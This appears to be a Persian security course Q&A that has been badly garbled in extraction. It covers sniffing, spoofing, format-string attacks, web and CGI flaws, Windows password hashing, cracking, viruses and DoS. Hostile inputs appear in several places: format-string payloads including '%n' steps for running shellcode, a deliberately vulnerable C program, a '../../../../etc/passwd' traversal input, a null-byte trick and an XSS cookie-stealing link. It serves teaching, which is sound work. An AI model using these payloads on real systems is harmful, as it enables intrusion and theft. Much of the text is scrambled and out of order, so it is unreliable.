ن يمهمتـر . دارد ي فراوان يايرکانه مزا يح و ز ي صح يرت اجرا ساده تراند اما در صو ي فن ين روشها از روش ها يا

. استيکيق پست الکتروني و ارتباط از طري تماس حضوريتماس تلفن:ن روش ها يا

۱۹‐ sniffingامکان ان وجود ندارد؟يست و چرا در حالت عادي چ sniffing ين خدشه اياز انجا که کوچکتر.شبکه به بسته ها و اطالعات در حال انتقال در يابي دست يعنيا استراق سمع ي

يياز انجـا .ستي قابل کشف ن ي شود و به راحت يرفعال محسوب م يک حمله غ ي کند يبه اطالعات در حال مبادله وارد نم

يکتا دارد و در اکثر پروتکل هاي يکيزيکه هر کارت شبکه ادرس ف

ي کننددر حالـت عـاد يافت م يمقصد خودشان را در با ادرس ييمورد استفاده مانند اترنت هر کارت شبکه فقط بسته ها

بسته ها را بدون توجـه بـه ادرس يم تمام يد قرار ده ي ق ياگر کارت شبکه را در حالت ب .امکان استراق سمع وجود ندارد

. دهنديد قرار مي قين قدم کارت شبکه خود را درحالت بي استراق سمع در اولي کند ابزار هايافت ميانها در

باشد؟يي چه اجزايد داراي حداقل باsnifferزارک ابي ‐۲۰ يلتـر مـ يافت کرده ف يافت که بسته ها را از شبکه در يراه انداز در . د با شد ي ق يک کارت شبکه که در حالت ب ي

ات بسته ها يلگر بسته که محتويتحل. ره اطالعات مرحله قبلي ذخيبافر برا. کنديره ميک با فر ذخيکند و در

.دهدي نشان ميدي کليلدهاي مختلف با توجه به فيرا در حالت ها

گذارد؟ اگر بله چگونه؟ي استراق سمع اثر مي شبکه رويا توپولوژيآ ‐۲۱زبانهـا ي مـشکل اسـت چـون ارتـبط م sniffing اسـتفاده از mesh ي بـا توپولـوژ ييمـثال در شـبکه هـا .بله

توان يزبان ها نمير مي است واز ساياختصاص

کـه از هـاب ييا شـبکه هـا يـ بـاس ي با توپولـوژ ييشبکه ها . افتيگر دست ي د يزبان ها ي م يبه کانال ارتباط

. استراق سمع مناسبندي فرستند براي مbroadcast کنند چون بسته ها را به صورت ياستفاده م

ـ .ص دهـد ي را تـشخ snifferد که وجـود يه کن ي ته ي شود ابزار ياز شما خواسته م ‐۲۲ يچـه راه حل د؟يکن يشنهاد ميپ

ي طراحـ يستميد س ي کنند با يد استفاده م ي ق ي در حالت ب يي از کارت شبکه ها sniffer ياز انجا که ابزار ها

.د قرارگرفته اند جستجو کندي قي را که در حالت بييم که کارت شبکه هايکن

بلـه د با ابزار ذکر شده در راه حل سـوال قبـل مقا ي خوه يد و م ي هست يک نفوذگر حرفه ا يشما ‐۲۳ د؟يکنيچه م.ديکن

نباشـد و کـارت شـبکه را در يابيـ م تـا قابـل رد ي فعال نگه نداري مدت طوالنيرا برا snifferم ي کني ميسع

.ميد ببري قياز به حالت بيهنگام ن

Page 14: Q&A

١٣

۲۴‐ spoofingدي شود؟ انواع ان را نام بري گفته مي به چه حمالت: spoofing يا مرکـز قابـل اعتمـاد معرفـ يـ افـراد يخود را به جا يا مرکزي شود که فرد ي گفته م ي به حمالت

دن بـه اطالعـات مـوردنظر خواهـد ين در جهـت رسـ ي معـ يجاد ارتباط با اهداف ي در ا يق سع ين طر ينموده و از ا

:ن حمالتيانواع ا.داشت

IP spoofing,ARP spoofing,Web spoofing,DNS spoofing,Email spoofing

شود؟ ي انجام م چگونهARP spoofiongحمله ‐۲۵ يزبـان هـا ي مي خـود بـرا MACمـورد نظـر و بـا IP با ادرس ي جعلARP responseام يک پينفوذگر

. فرستدي خود را به نفوذگر ميزبان هدف بسته هايب مين ترتي فرستد به ايهدف م

ست؟يرد چي گي مورد سواستفاده قرار مEmail spoofing ي که براSMTPنقطه ضعف ‐۲۶ يگـران مـ يا از طرف دي ي با نام جعليکي نفوذگر اقدام به ارسال پست الکترونEmail spoofingه در حمل

تـوان بـه ي دهـد مـ يات احـراز اصـالت را انجـام نمـ يعمل) SMTP(ل يمي که پروتکل ارسال ا ييکند از انجا

. افراد مختلف ارسال کردي براي جعلي نامه هايراحت

: به آدرس زير مراجعه نماييدformat string attackبراي اطالعات کامل در باره http://julianor.tripod.com/teso-fs1-1.pdf

: مقايسه نماييد stack smashing را با رخنه format stringرخنه ‐۲۷

. باشدstack smashing مي تواند بسيار خطرناک تر از format string برخي معتقدند که رخنه

format string از نظر تعداد برنامه هـاي exploit در . آمـار کمتـري را بـه خـود اختـصاص داده اسـت

يـک خطـاي برنامـه format string يـک تهديـد امنيتـي اسـت ، stack smashingحاليکه ماهيـت

تکامـل يافتـه وپيـشرفت کـرده اسـت و روش stack smashingتکنيک هـاي . نويسي محسوب مي شود

برخي مواقع بسيار سخت stack smashingقابليت کشف . بتداي کار است در اformat stringهاي

. کشف ساده تري داردformat stringاست ولي

همراه با اشاره بـه : ( از کجا پديد مي آيد ؟ نوع آن را کامال شرح دهيدformat stringرخنه ‐ ۲۸ )stackساختار

ز نحوه به کار گيري رشته هـاي فرمـت در تـوابعي مثـل هاي نرم افزاري است که ا bug اساس اين رخنه بر

printf،sprintf، fprintf، snprintfدر زبان... ،و Cبه وجود مي آيد .

:در رشته هاي فرمت اين توابع کاراکتر هاي جدول زير به کار مي رود

Page 15: Q&A

١٤

، printfتـابع در يـک قطعـه کـد از نـرم افـزار ، در حـين اسـتفاده از Cفرض کنيد يک برنامه نويس زبـان

.مرتکب اشتباه شده و رشته فرمت را فراموش کند

printfاستفاده صحيح و خطر ناک از تابع ‐۱شکل

.به اين ترتيب برنامه نويس بدون اينکه متوجه باشد ، امکان کنترل برنامه خويش را به نفوذگر داده است

:فرض کنيد دستور زير اجرا شده باشد: پردازيم ميprintf بعد از استفاده از دستور Stackابتدا به ساختار

printf ("Number %d has no address, number %d has: %08x\n", i, a, &a);

: پس از اجراي اين دستور به گونه زير استstackساختار

Page 16: Q&A

١٥

تر را بـر نخـورد عـين کـاراک %و هرجا که به . را پردازش مي کند’A‘تابع فرمت حال رشته فرمت استرينگ

برسد نوع مقداري که بايد چاپ شود را بررسي کرده و از پشته به عنوان ورودي %چاپ کرده و هرجا که به

خطر استفاده نکـردن از رشـته فرمـت در تـابع اينچنينـي کـه ورودي آن نيـز از کـاربر . تابع بارگذاري مي کند

رت معتبر يک رشته فرمت را به ايـن کاربر مي تواند به جاي يک عبا . دريافت شود همين جا مشخص مي شود

در اين حالت او مي تواند محتويات پشته را بخواند و در جـاي خاصـي از حافظـه مقـداري را . کند passتابع

.بنويسد

، مـشاهده crashاز جمله خطراتي که حمله کننده مي تواند از آن استفاده کند، شکست روند اجراي برنامـه

، نوشتن مقدار خاصي در جايي از حافظه و نهايتـا ، ديدن حافظه در جاي دلخواه حافظه پروسه ، مشاهده پشته

shellاستفاده ازاين موضوع به همراه تغيير مسير بازگشت برنامه به آن محل و مانند سرريز بافر ، اجراي يک codeاست .

فظه براي خواندن استفاده مي کنـد آنقدر از مقادير پشته به عنوان اشاره گر به حا s%مثال کد زير با استفاده از

.تا باالخره با يک دسترسي غير مجاز سبب توقف برنامه از سوي سيستم عامل شود

printf (“%s%s%s%s%s%s%s%s%s”); .بايت چاپ مي کند۸ بايت ۸ را stackيا برنامه زير مقادير

printf ("%08x.%08x.%08x.%08x.%08x\n");

: را بنويسيدshell code از نوع اجراي format string مراحل يک حمله به رخنه ‐۲۹ :يافتن افست براي رسيدن به اول رشته فرمت براي در دست گرفتن کنترل برنامه‐۱

هاي متوالي بعـد x%براي اين کار الزم است رشته معلومي را در ابتداي رشته فرمت قرار دهيم و با قرار دادن

حـال فاصـله تـا ابتـداي رشـته و تعـداد . در تغيير دهيم تا رشته ما چـاپ شـود ها را آنقx% از آن ، تعداد اين

popهاي مورد نياز مشخص شد .

:با کمک روش با ال عدد دلخواهي را در آدرسي از حافظه مي نويسيم ‐۲

“Address %x%x…%x %n”

Page 17: Q&A

١٦

بايـستي تعـدادي بنويسيم بـراي ايـن منظـور addressهدف ما اين است که بتوانيم هر عدد دلخواهي را در

را جلـو ببـرد و مجمـوع ايـن snprintfحرف ثابت را نيز در رشته فرمت قرار دهيم به نحـوي کـه شـمارنده

مـورد نظـر ، همـان address ها نوشته مي شود و خـود طـول x%حروف ثابت با تعداد حروفي که توسط

. بنويسيمaddressعددي شود که مي خواهيم در

“address %x%x…%x AA…A %n” %nتعداد بايت هايي که تا بحال نوشته شده را مي نويسد .

را توسط اين روش به درون حافظه کپي کرده و در پايان با نوشتن آدرس بازگشت تابع shellcodeحال ‐۳

.، روند اجرا را به آنجا منتقل مي کنيم

remoteل نفوذ به صـورت بنويسيد که قابc به زبان format string يک برنامه به همراه رخنه ‐۳۰ :باشد

--------------fmt.c------------------ #include <stdio.h> #include <stdlib.h> #include <unistd.h>

void vulnerable (char *arg) { char buf [1024]; char string[64]; strcpy (string,”AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”); snprintf (buf , sizeof (buf)-1, arg); /* the vulnerability itself*/

printf(“%s\n”,buf);

return; }

int main(int argc, char **argv) { If (argc>1) vulnerable(argv[1]);

return (0); } --------------fmt.c------------------

:به سايت زير مراجعه کنيدت وب يبراي اطالعات کامل در زمينه امنhttp://www.owasp.org

Page 18: Q&A

١٧

يک رخنه براي هجوم عليه کاربرد تحت وب در : معماري کاربرد هاي تحت وب را رسم نماييد ‐۳۱ کجا رخ مي دهد؟ اين رخنه از چه نوع است؟

معماري کاربرد هاي تحت وب

ناشي از سهل انگاري يا اشتباه يک برنامـه نـويس در پيـاده سـازي web application يک رخنه در

براي مثال اگر برنامه نويس اطالعات مربوط به قيمت يـک تـراکنش خريـد را بـه صـورت . يک کاربرد است

با مشتري ردوبدل کند اين خطر وجود دارد که کاربر خود ميزان قيمت تمـام شـده را بـا hiddenيک فيلد

طـرف مـشتري validationيـا اتکـا بـه يـک . گزين کرده و دوباره براي سرور بفرستدمقدار کمتري جاي

ممکن است با يک ورودي غير معتبر از سو ي کاربري که با يک فرم تغيير يافته اطالعات را مي فرستد باعـث

. شود تا اطالعات غير معتبر در ديتابيس قرار گيرد

.ندارد...ال کاري با متد هايي چون سرريزبافرواين حمله در سطح برنامه کاربردي است و اص

هر کدام از ايـن دو دسـته خـود . اشيا تحت وب به دو دسته کلي طرف سرور و طرف مشتري تقسيم مي شوند

. حمله به اشيا طرف سرور با تزريق کـد صـورت مـي گيـرد . هستند non-script و scriptشامل دو نوع

. اطالعات ورودي استvalidationاساس جلو گيري از اين حمله

فرض کنيد شـما نماينـده يـک شـرکت خـدمات امنيتـي هـستيد و بـا يـک مـشتري قـرارداد ‐ ۳۲

penetration testingبسته ايد .checklistشما شامل چه مواردي خواهد بود؟ XSS or CSS vulnerability SQL injection CGI code injection Trusting hidden variables Trusting cookies Directory traversal Embedded script attack Sql injection 404 error pages Character filtering PHP Security

Web browser Web server

Web application

Database engine

Page 19: Q&A

١٨

File upload and execution Application logic attack Input validation

:ليست کامل مسايل امنيتي وبVulnerability:Category/php.index/org.owasp.www://http

۳۲‐ Phishingچيست؟ ابزارها و روش هاي آن شامل چه مواردي مي شود؟

Phishing به مجموعه عمليات رواني و فني براي کسب اطالعات شخصي افراد با هـدف سـودجويي از آن

spyware.ارهاوروش هاي خرابکاري و سرقت اطالعات در ايـن زمينـه کـاربرد دارد همه ابز . گفته مي شود

. ها ابزار هاي اين کار هستندkeylogger ها و Trojanها ،

همچنـين روش . از سوي برنامه نويسان مي تواند زمينه ساز سوء استفاده هکـر هـا شـود XSSرخنه هايي چون

ايي در مرور گرهاست به همراه بي اطالعي يک کـاربر از که منشا آن باگ هweb spoofingهايي چون

.مسائل امنيتي شانس موفقيت هکر را براي نيل به هدفش بيشتر مي کند

و مواردي را مثال بزنيد که بتوان با اسـتفاده از آن بـه . را رسم نماييد CGIدياگرام يک برنامه ‐۳۳ . حمله کردCGIيک برنامه

CGIبرنامه

:به علت عدم فيلترينگ مناسب ورودي: پيمايش شاخه •

”etc/passwd/../../../..”:مثال ورودي باعث مي شـود بتـوان تـوابعي را بعـد از متغيـر ; استفاده از کاراکتر sendmailفراخواني توابع سيستمي و •

.خواسته شده اجرا کرد

• Poison null byte :ريدقطعه کد زير را در نظر بگي

open (FILE, “$ui.html”); # print the file to an html document

close (FILE); در . رابـاز مـي کنـد html مي باشد و ظاهرا نشان مي دهـد کـه ايـن برنامـه تنهـا فايـل هـاي perlاين قطعه کدبه زبان

. مي باشدtestه فايل انتساب داده شود فايل باز شد”test%00“ مقدار uiصورتيکه اگر به متغير

کد زير چه رخنه اي دارد؟ چگونه مي تواند توسط يک هکر اسـتفاده شـود؟ يـک نمونـه مثـال ‐۳۳ :بزنيد

Web browser Web server CGI

Page 20: Q&A

١٩

view.php <?php echo (“welcome “.$_GET[‘username’]); ?>

. داردCSS(Cross Site Scripting) يک باگ phpاين برنامه

حفره يک لينک آلوده درست نمايد و آن را با ايميل به يک کاربر ارسال يک هکر مي تواند با استفاده از اين

.کند

:لينک نمونهVulnerable.com/view.php?username= <script>alert(document.cookie);</script>

Page 21: Q&A

٢٠

فصل چهارم کلمات عبورشکستن

ست؟ي چSAMل يفا ‐١

ت ي فعالي حالت کاربرkernel mode. ۲ و user mode.۱: استmode دو ي دارا۲۰۰۰ندوز ي ويمعمار

يم مـ ي تقـس sub بـه نـام يير مجموعه هـا ي کند که آنها هم به زي ميبانيندوز را پشتي کاربران و ارتباطات آن ها با و يها

است کـه Local Security Authority(LSA) است که به security ستميرسيستم ها زين سي از ايکيشوند

ي را وارد مـ password و user nameک کـاربر يـ يوقتـ . ا نـه يـ معتبر بوده loginي کند تالش ها براين مييتع

Security)يتـ ي امنيهـا accountر يستم بـه نـام مـد يـ ک سيـ ن اطالعـات را بـه يـ اsecurityستم ير سيکند، زAccount Manager) ا يSAMفرستد ي م SAM هـر ي دارد کـه معمـوال بـرا يگـاه داده اعتبـار سـنج يک پايـ

account ش ي دو قسمت رمز وجود دارد نمايبر کارLMو يمي با محصوالت قدي سازگاري برا NT hashي برا

. NT/2000 يستم هاي با سيسازگار

ندوز چگونه است ؟ي ساختار کلمات عبور در و‐۲

يره کردن آن در متن واضح دو درهم سـاز ي ذخ ينکه به جا يندوز عبارت است ازا يساختار کلمات عبور در و

.نام دارد NT Hash يگري و د LM Hash يکي شود که ي کلمه اعمال ميمتفاوت رو

۳‐ LM Hash د ؟يح دهيست ؟ توضي چ

و )۰ اضـافه شـدن کـارکتر ----> ۱۴طـول کمتـر از (ل و ي ابتدا کلمه به حروف بـزرگ تبـد LM Hashدر

ن رشـته يو با ا. شود يد مي تول فرديتي با پر DESد يک کليمه يم واز هر ني تقسيتي هفت بايمه يجه به دو نينت

مه يضم >‐‐‐. شودي رمز م%$#@! KGS رشته ثابت DESد ثابت ي به عنوان کليتي هشت بايها

LM Hash به نام يتي با۱۶ > ‐‐‐‐جيشدن نتا

Page 22: Q&A

٢١

د ؟يندوز را نام بري احراز اصالت در وي پروتکل ها‐۴

• Keberos • NTLM • DPA • EAP • SChannel

.دي را شرح ده NTLM و LMد اصالت يي تايسم هايمکان ‐٥ :LM پروتکل احراز اصالت

domain) بـه کنتـرل کننـده دامنـه (plain text) شناسـه کـاربر را بـه شـکل مـتن واضـح ين متقاضي ماش●

controller)فرستدي م .

. فرستديم يرا به متقاض) نانس (يتي ب۸ قاعده يک عدد بي کنترل کننده دامنه ●

ا با يبا افزودن صفر ( کاراکتر ۱۴ل آن به يسپس با تبد. کندي مupper case را password ين متقاضي ماش ●

۷ کـاراکتر را بـه دو قـسمت ۱۴: کنـد ي را آغاز م hash) کاراکتر باشد ۱۴ش از ي اگر ب يي انتها يکم کردن کاراکتر ها

صـفر ي شده را با افزودن تعـداد يت درهم سازي با۱۶ دهد ين انجام م آي را روLM hash کند سپسيم مي تقسييتا

DES(dataد يــت ســه کليــک بيــ کنــد، بــا افــزودن يم مــي تقــسيي تــا۷ رســاند،و بــه ســه قــسمت يت مــيــ با۲۱بــه encryption standard)کنـد، يکبار رمز مـ يدها نانس رايک از کلي کند، حاال با هر يجاد مي اي رمز نگاري برا

. کنديمه کرده و به کنترل کننده دامنه ارسال ميا با هم ضمآن ها ر

گـاه داده اش انجـام داده و بـا پاسـخ يره شـده در پا يـ ذخpassword بـر يکـسان يات ي کنترل کننده دامنه عمل ●

.ات احراز اصالت موفق بوده استي کند در صورت تطابق عمليسه مي مقايمتقاض

:NTLMپروتکل احراز اصالت

):س دهنده در کار نباشديسرو( باشد ير شامل دو طرف کنترل کننده دامنه و متقاضاگ

. کندي وارد مين متقاضي را بر ماشpassword و user کاربر ●

. اندازدي را دور مpass کند و ي مNThash را pass ين متقاضي ماش ●

. فرستدي دامنه م را به کنترل کنندهuser ين متقاضي ماش ●

. فرستدي ميرا به متقاض) نانس (يتي ب۸ قاعده يک عدد بي کنترل کننده دامنه ●

. فرستدي کند و به کنترل کننده دامنه مي شده رمز مhash که pass نانس را با ي متقاض ●

گـاه داده اش انجـام داده و بـا پاسـخ يپاره شـده در يـ ذخpassword بـر يکـسان يات ي کنترل کننده دامنه عمل ●

.ات احراز اصالت موفق بوده استي کند در صورت تطابق عمليسه مي مقايمتقاض

ق يـ س دهنده خواهد بود و کنترل کننده دامنه فقط کـار تطب ي سرو ي را بخواهد مخاطب متقاض يسي سرو يحاال اگر متقاض

. دهديرا انجام م

۶‐ NT Hash ؟د يح دهيست ؟ توضي چ

NT به نام يده در هم سازيچک> ‐‐‐‐ MD4 يتم درهم سازيالگور > ‐‐‐‐ Unicode > ‐‐‐کلمهHash

Page 23: Q&A

٢٢

کدام اند؟password cracking ي انواع حمله برا‐٧ ...خ تولدو ي ، شماره شناسه ، تاري مانند نام و نام خانوادگ:حدس زدن ‐

‐:Brute force attack در حملـه Brute force يبـات ممکـن بـرا يرک تي تمـام password ي امتحـان مـ

alpha numericک يـ يمـثال بـرا . رسـد يشه بـه جـواب مـ يـ ن نوع حمله است کـه البتـه هم يرترين وقت گيا.شودpassword ۸ 20 يي تاbilion مـثال حـداکثر : دارد ي بـستگ ين نوع حمله به عوامل ي ا يسخت. د چک شود يب با ي ترک

تـالش ي هست که پس از چند بار تالش باعث قفل شدن و عدم اجازه برا يزمي مکان ايا آ ي تواند باشد يطول پسورد چه م

... شود؟ وي بعديها

‐ Dictionary attack : ه لغـات موجـود در يـ امتحـان کـردن کلdictionary ار کـاراتر از يبـس . اسـتbrute force است چون اغلب کاربران password کننـد کـه در ي قابـل حـدس و سـاده انتخـاب مـ ي ها dictionary

.کنديشتر مي شانس را بي تر با لغات خارجي بزرگ تر و فنdictionary...). ن ها ويوانات، ماشيمثل نام ح(هست

‐ Rainbow attack : در حمالتbrute forceي تکـرار ين ها کـار ي ماشي همه يه پسورد ها روي محاسبه کل

ن يقـا در همـ ي دق rainbowجـداول . رود يار باالتر مـ يره شود سرعت بس يج ذخ يک بار محاسبه نتا ياست، اگر پس از

هـا و hashره تمـام يـ ذخ. اسـت time و memoryن ي بـ trade off از يرابطـه هـستند، کـه در واقـع نـوع خاصـ

password رد، جداول ي گ ي م يادي ز يلي ها حافظه خrainbow ياز را کـاهش مـ يـ حجم حافطـه مـورد ن ي به روش

يره مـ يـ از آن ذخي فقـط کـسر کـوچک ي شود ولـ ي ها محاسبه مpassword ها hash يق که تمامين طريدهند به ا

ک ي hash ي ابتدا به صورت تصادفيعني شود، يره مي ذخيره اي ها به صورت زنجpassword ها وHash. شود

بع تـا يد بـا طـول اسـتاندارد بـرا يـ جد يک ورود يـ شود تـا يک تابع کاهش بر آن اعمال م ي شود بعد يکلمه محاسبه م

hash تابع کاهش، ين خروج ي ا يد شود دوباره رو ي تول hashing بـار تکـرار ۱۰۰۰۰ات يـ ن عمل يـ شـود ا ي انجـام مـ

. شوديد مين رشته ها تولي تا از اM . کنديره مي اول و آخر در جدول ذخpasswordت فقط يشود و در نهايم

Pass1—hash word1—reduction pass2—hash word2—reduction pass3…/\… word9999—reduction pass10000

Pass10000,1 Pass1,1 … …

… … Pass10000,m Pass1,m

hashکيـ م، مـثال اگـر ي پسورد آن را بدست آور hashک ين جداول از يم با استفاده از ا ي خواه يد م يحاال فرض کن

ن يـ از ا ييم، هرجـا يکنـ يد م يـ تول يي تـا ۱۰۰۰۰ر يک زنج ين مقدار ي باشد، با شروع از ا pass10,1م که معادل يداشته بش

ر يـ د زنجي همان سطر شروع به توليرا ابتدايم، زيده اي جدول مطابق باشد به هدف رسي از سطرهايکي ير که با انتها يزنج

بهتر از .(ک مرحله قبل جواب است ي محاسبه شده passم ي شو يم متوقف م يدير که به تطابق رس ي زنج يم هر جا ي کن يم

!)ح بدمي تونم توضين نميا

ـ را شرح ده kerberos پروتکل احراز اصالت ‐٨ د تفـاوت عمـده آن بـا پروتکـل احـراز اصـالت يNTLM و LMست؟ي چ

چ وجـه يابد، رمز عبـور بـه هـ يد بر شبکه انتقال يرمز عبور کاربر نبا : ن شرح است ين پروتکل به ا ياهداف ا

ره شـود،از هـر يـ د ذخيـ نبا server data base بـر يره شود، رمز عبـور حتـ ي ذخclientستم يد بر سينبا

Page 24: Q&A

٢٣

توانـد بـدون وارد ين کـاربر مـ ي شـود بنـابرا ي رمز عبور مي تقاضاwork station بار در هر۱کاربر تنها

شـناخته single-sign-on داشته باشد، که به عنـوان يس ها دسترسي سرويکردن مجدد رمز عبور به تمام

د صحت خـود يز باي نapplication serverودش را اثبات کند بلکه د اصالت خينه تنها کاربر با. شوديم

با پروتکل kerberosند تفاوت عمده ي گو ين احراز اصالت دو طرفه م ي اثبات کند که به ا client يرا برا

قـادر بـه ارتبـاط بـا ي جعلـ serverک يـ ق يـ ن طر يـ ن اسـت، بـه ا ي هم LM و NTLM احراز اصالت يها

client آوردن جه بدست ي و در نتhash گـر يا هر سو اسـتفاده د ي) افت پاسخيبا ارسال نانس و در( رمز عبور

.س هاستي به کاربر جهت استفاده از منابع و سروticket بر ارائه ين پروتکل مبتنيا. ستين

چگونه است ؟ NTLM حمله به پروتکل ‐۹ کنـد يس دهنده ارسال مـ ي به سرئ LM را با پاسخ NTLM در هنگام احراز اصالت پاسخ ين متقاضيماش

ي و خطـا از رو ي تئاند کلمه عبور کاربر را به دست آورد و بـا سـع ي م BRUTE FORCE با يو نفئ ذ.

LM کلمه عبور NTLM را به دست آورد.

شود؟ي انجام ميتمينوکس با چه الگوري در لي در هم ساز‐۱۰ DESتم ي با الگوريمي قدينوکس هايدر ل •

MD5تم يد با الگوري جديوکس هانيدر ل •

د ؟يح دهي را توضMD5تم ي توسط الگوري مراحل در همساز‐۱۱

ت اول آن يـ با۱۲ > ‐‐‐ يتي با۳۴ يخروج > ‐‐‐ يتم درهم سازيالگور > ‐‐‐ saltک يکلمه عبور با

. شود ي در نظر گرفته م saltبه عنوان

Page 25: Q&A

٢٤

فصل پنجم ستم هدفي سيبه قصد از کاراندازهجوم

ست؟يروس چيو‐الف‐١ :دين را نام ببر انواع آ‐ب :ديح دهيروس را توضير وي تکثي استراتژ‐ج

ا يـ انه را ، بدون اجـازه ي را ي عملکرد عاد ي است که به گونه ا يوتريک برنامه کامپ ي يوتريروس کامپ يو‐الف

يعيف وس ي ط ين لغت برا ينکه ا يبر خالف ا . ر دهد ييانه تغ ي را يل ها يله پنهان شدن در فا ياطالع کاربر آن بوس

:ر را داشته باشدي زيژگيد دو وي بايروس واقعيک وي شود،ي مخرب استفاده ميرم افزار هااز ن

.ر کندي خود را تکث‐۱

. خود را اجرا کند‐۲

:روسيانواع و‐ب

Polyboot.B (boot sectorروس يـ ، و) Randex, Meve and MrKlunky(ليـ روس فايوand AntiEXE (يروس چند بخـش ي، و) Ywinz (اکروروس مـ يـ ، و)Relax, Melissa.A and

Bablas(روس شبکهي، و)Nimda and SQLSlammer (روس يو وemail)روس ماکروي وينوع (

ب يـ ، تخر ي ، جـک، خرابکـار يقـات ي تحق يپروژه ها : روس ها وجود دارد ي ساخت و ي برا يادي ز يزه ها يانگ.

.ي اطالعات شخصي از راه دزدي ودرآمد مالياسي سيام هاي ، ارسال پيک کمپانيمحصوالت

. شونديم ميم تقسير مقيم و غيروس ها به دونوع مقير وينه تکثي در زم‐ج

: روديروس به کار مير وي تکثير برايم روش زير مقي غيروس هايدر و

Page 26: Q&A

٢٥

د را باز کنيل جديفا ‐۱

ا نهيد آلوده است ي جدييل اجرايا فايچک کن آ ‐۲ د اضافه کنيل جديد را به فايکد جد ‐۳ ره کني را ذخيينقطه شروع اجرا ‐۴ د اضافه کني را به محل کد آلوده جديينقطه آغاز اجرا ‐۵ .روس بشناسان تا بعد از اجرا شدن به آنجا برودي را به وينقطه آغاز قبل ‐۶ ره کني ذخييل اجرايرات را در فاييتغ ‐۷ aل آلوده شده را ببنديفا ‐۸ يابي آلوده کردن بي را برايديل جديبه جستجو گر باز گرد تا فا ‐۹

يد بـرا يـ جد يليافتن فـا يـ ين تفاوت که بـه جـا ي رود با ا ي مشابه به کار م يزميز مکان يم ن ي مق يروس ها يدر و

ل را انجـام دهـد آنگـاه يـ ک فا يـ چـون بـاز کـردن يستم عامل عملـ ي ماند تا س يروس منتظر م يآلوده کردن و

. کندير مي مستعد تکثيل هايروس خود را در فايو

م در حافظـه را يروس مقـ يـ بگردد و نتواند و يروسي و يل ها ي به دنبال فا ابيروس يک و ي که يمثال در صورت

روس ي شود شانس آلوده شدن به و يروس دسترس ي و ي که توسط جستجو گر آنت يلي کند آنگاه هر فا ييشناسا

.را خواهد داشت

ست؟يروس چيست؟ و تفاوت آنبا وي کرم شبکه چ ‐۲ توانـد ي مستقر شده و م‐وتر يکامپ" مثال‐ شبکه يد که در گره ها شو ي از نرم افزارها گفته م ي کرم به گونه ا

ر گـره هـا منتقـل يق شبکه بـه سـا ي از خود را از طر يگري به آن گره نسخه د دنب رسان ي و آس يعالوه بر زندگ

ل يک فاياز به اتصال به ير شدن ني تکثيروس ها ، کرم ها برايبر خالف و .ز دچار مشکل سازديکند و آنها را ن

ي ارتبـاط ي شوند، با اشغال کردن فضايزبان خود ميب ميعالوه بر آنکه باعث تخر " کرم ها معموال .دا ندارند ج

توانـد ين خـود مـ يـ آورنـد کـه ا ي ارتباطات در شبکه را به همـراه مـ يک و کند ي چون تراف يريدر شبکه، تاث

.نترنت شودي شبکه ا ازي بخش عمده ايا حتيزات در شبکه و ير تجهيت ساي فعالي برايعوارض بعد

ست؟يروس چي ويآنت‐٣شـود، يکـش هـم شـناخته مـ روسيـ اب و و يـ روسيـ و يهـا که با نـام ) Anti-Virus(روس يافزار ضدو نرم

يهـا ا کـرم يـ روسـها ي وي آشـنا يها، بـه دنبـال الگوهـا پروندهي محتواي است که با مشاهده و بررس يافزار نرم

گفتـه ) Virus Signature(روس يـ وين الگوها که بـه آن امـضا يدر صورت مشاهده ا. گردد ي مينترنتيا

دهـد و يا به شما هـشدار الزم را مـ يکند و ي ميرياش جلوگ وتر شما و اجرا شدن يشود، از ورود آن به کامپ يم

يشـرکتها . کنـد يد آن را اصـالح و پاکـساز ي نما يا سع يل را حذف کند و يا فا يرند که آ يگ ياز شما دستور م

آنها را کشف و جمـع ي نرم افزار يد، الگوها ي جد يروسهايروس، با ساخته شدن و ي ضدو يافزارها مسازنده نر

) Update (يروزرسـان بـه يافزارها هر از چندگاه ن نرم يلب الزم است تا ا غن علت ا يکنند و به هم ي م يآور

ي از هوشمند يا درجه يارا د ييها برنامه يا انهي را يروسهايو.افت کنند يروسها را در يد و ي جد يشوند تا الگوها

ا افـراد يـ روس يـ ء و سندهيـ ء شـما بـه نو انـه ي از را ي وجود دارد که توسط آنها اطالعات ياري بس يهستند و روشها

د، خبـر يـ بر ين ميد و از بيکن ي ميي که شما آنها را شناساي از اوقات هنگام ياريبس.گر ارسال شود ي د يسودجو

Page 27: Q&A

٢٦

يها ده است و راه يشيوتر شما قبالً چارهء الزم را اند يعال شدن در کامپ ورود مجدد و ف يروس برا يد که و يندار

.جاد کرده استي شما ايا انهيا شبکه رايانه ي حمله مجدد به رايبرا) Backdoors (يگريد

.دي را نام ببرينترنتي ايانواع کرمها ‐٤• Email Worms • Instant Message worms)ي ناگهانيکرمها(

ينترنتي ايکرمها •

• IRC Worms) کنندي گسترش استفاده مي که از پروتکل چت براييکرمها(

• File sharing Network Worms

DOSحمالت

شود؟ي گفته مپي به چه نوع حمالتDOSستم حمالت يت سيدر مبحث امن ‐۵ DOSز،حملـه کـاربران مجا يبـرا ) معموال سـرور (وتريرقابل دسترس کردن منابع کامپ ي در جهت غ ي به هر نوع تالش

شوديگفته م

کدامند؟DOS حمالت يانواع روشها ‐۶ ستمير سيد ناپذيا تجدياب،محدود و يش از حد از منابع کمياستفاده ب • ستمي سيکربندير دادن اطالعات پييا تغيخراب کردن •

ستمي سيکيزير دادن اجزاء فييا تغيخراب کردن •

ور سرينه برايس پر هزيک سروي مکرر به يدرخواست ها • ع شدهي توزDOSحمالت •

ـ ي جزء کدام DOS ،SYN Flood حمله ياز متدها ‐۷ رد؟نحـوه ي گيک از انواع حمـالت قـرار م

.ديح دهين متد را توضيعملکرد ا .ردي گي استفاده از منابع محدود قرار ميعني جزء نوع اول

ي را به سـمت قربـان يرس مبداء جعل با آد TCP/SYN ي از بسته ها ييل آسا يان س ين نوع حمله مهاجم جر ي در ا

شـده و در ي تلقـ (connection request) ارتبـاط يک تقاضـا يـ ن بسته ها به عنـوان يک از ايهر . فرستديم

ي حافظـه را بـرا ي از فضا يب که مقدار ين ترت ي کند به ا يجاد م ي آن ا يمه باز برا يک ارتباط ن ي) يقربان(جه سرور ينت

فرستد ي به آدرس مبداء م TCP/SYN-ACKک بسته يط اختصاص داده و اطالعات مربوط به ارتبا ينگهدار

مـه بـاز نگـه داشـته و ين ارتباط را به صورت ن ي ا ي مدت محدود يسرور برا . ماند ي م TCP/ACKو منتظر بستهء

